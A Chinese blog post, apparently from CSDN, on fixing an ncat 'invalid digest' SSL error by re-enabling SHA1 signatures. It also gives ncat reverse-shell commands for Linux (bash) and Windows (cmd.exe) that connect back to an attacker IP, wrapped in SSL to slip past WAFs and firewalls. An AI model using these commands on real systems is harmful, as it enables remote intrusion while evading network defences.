解决ncat的Ncat: ssl_gen_cert(): error:03000098:digital envelope routines::invalid digest. QUITTING.

已于 2024-08-15 12:02:18 修改
阅读量65 收藏
点赞数
文章标签: ssl 服务器 网络协议
于 2024-08-15 11:36:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fjh1997/article/details/141218268
版权

Ncat: ssl_gen_cert(): error:03000098:digital envelope routines::invalid digest. QUITTING.

原因是新版本openssl sha1不支持了
需要设置环境变量:export OPENSSL_ENABLE_SHA1_SIGNATURES=1
参考:https://github.com/dotnet/runtime/issues/65874
另外如果ncat反弹shell不完整,没有显示全命令提示符,可以加-i参数。还可以加上–ssl参数进行加密绕过waf:

victim> ncat <ip> <port,eg.443> --ssl  -c  "bash -i 2>&1"
attacker> ncat -l <port,eg.443> --ssl

victim
ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"
attacker
ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl
fjh1997
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pyncat:ncat -l 8086 --exec“ ncat 127.0.0.1 8080” -k
05-19
标题 "pyncat:ncat -l 8086 --exec“ ncat 127.0.0.1 8080” -k" 提到的是一个使用ncat命令行工具进行网络通信的场景,而描述中的"yn猫"可能是对这个工具的一种昵称或项目名称。在描述中,我们看到两个不同的命令行...
【已解决error:1408A0C1:SSL routines:ssl3_get_client_hello:no shared cipher
qq_38181411的博客
09-24 1182
Q 在研究某漏洞时发现 Windows10 Pentestbox ncat 接收 https 消息报错如下: A 使用 ubuntu 安装 ncat apt-get install nmap # ncat 是集成在 nmap 中的,安装完成后再开启 ncat 监听 接收成功~
报错:Ncat: bind to :::8888: Address already in use. QUITTING
weixin_927326的博客
05-25 1816
报错:Ncat: bind to :::8888: Address already in use. QUITTING
出现Ncat: bind to 0.0.0.0:9999: Address already in use. QUITTING.如何解决
Elegent_lily的博客
11-03 2596
出现Ncat: bind to 0.0.0.0:9999: Address already in use. QUITTING.如何解决
报错:Ncat: bind to :::9999: Address already in use. QUITTING.
木泽锐
01-10 4296
Flink部署程序时遇到端口被占用,如下: 解决办法: 1.找到占用进程: netstat -nap | grep 进程id 2.杀死进程: kill 53471 进程终止!
ncat-7.92-1.x86_64.rpm
09-28
ncat-7.92-1.x86_64.rpm
nmap-ncat-6.40-19.el7.x86_64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
nmap-ncat-7.70-6.el8.x86_64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
nmap-ncat-7.70-5.el8.x86_64.rpm
01-15
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
【openssl s_server error】system library:BIO_bind:Address in use
sduyyy的专栏
08-12 260
在这种情况下,它表示服务器已经使用了相同的端口——如果在没有参数的情况下启动docker,该image会自动启动启用QSC的TLS服务器。可以通过将参数传递给docker调用来避免这种情况。命令行启动docker,docker run -it openquantumsafe/oqs-ossl3 sh。
国际国密双算法SSL证书申请方法
joySSL_的博客
08-12 622
首先,需要选择一个提供国际国密双算法SSL证书服务的CA机构。JoySSL作为国内自主品牌,不仅提供双算法SSL证书,还确保整个验签过程都在国内完成,重要数据不会出境,全面满足国家相关规定。部署完成后,测试网站地址栏是否可以HTTPS正常访问,以确保证书安装和配置正确无误。用户注册-JoySSL
企业级OV SSL证书获取步骤
William1234er的博客
08-13 734
获取企业级OV SSL证书涉及选择CA、确定证书类型、准备申请材料、进行验证、安装证书等多个步骤。每一步都需谨慎操作,确保信息准确无误,快速通过验证。部署后,网站将实现数据加密传输,提升用户信任度和网络安全防护水平
OpenSSL源码编译及Debug
最新发布
Angelic_lan的博客
08-15 216
OpenSSL源码编译及Debug
OPENAI - AZURE SSL error certification verification error
suiusoar
08-15 494
OPENAI - AZURE SSL 错误:证书验证错误
IP地址申请SSL证书
William1234er的博客
08-12 353
如果想实现IP地址https加密访问,则需要申请IP地址专用SSL证书,JoySSL是一个提供IP地址证书的国内服务商,您可以通过其官方网站申请。下面是申请IP地址证书的具体流程
SSL/TLS协议安全性增强:现代加密套件与最佳实践
A526847的博客
08-15 496
SSL最初由Netscape公司开发,后来被TLS所取代,但两者在功能上高度相似,常被统称为SSL/TLS。SSL/TLS协议通过加密客户端和服务器之间的通信数据,防止数据在传输过程中被窃取或篡改。它使用证书认证机制验证服务器身份,并通过加密套件实现数据的加密、解密和完整性校验。
通配符SSL证书快速申请教程
2401_86337938的博客
08-14 531
通配符证书在具有大量子域名需要加密服务的情况下非常实用,尤其对于那些经常添加或修改子域名的企业来说,能够大大简化证书管理并降低成本。然而,值得注意的是,通配符证书通常只适用于同一级别的子域名,不能跨越不同级别的子域名,比如不包括二级或多级子域名。1.如果只是单纯的一个域名(非泛域名),只需要在网站目录创建特定的文件就可以完成验证,自动部署,无需人工操作。根据信息审核,将以邮件或是电话的形式验证单位组织信息,证书颁发机构完成SSL证书的审核。SSL证书可以涵盖了子域名,适合未来或者现在有很多子域名的网站。
phpmailer如何配置SSL以发送安全电子邮件?
DengHua2203的博客
08-12 469
使用phpmailer时,关注SSL配置不仅可以提高邮件的安全性,还能增加用户对系统的信任。AokSend集成API与SMTP,Phpmailer助力,高效邮件营销,一键触达全球客户!
Ncat: bind to :::8888: Address already in use. QUITTING.
01-17
"Ncat: bind to :::8888: Address already in use. QUITTING." 这个错误表示在绑定到端口8888时出现了地址已被占用的情况。这通常是因为另一个进程已经在使用该端口。为了解决这个问题,你可以按照以下步骤进行操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值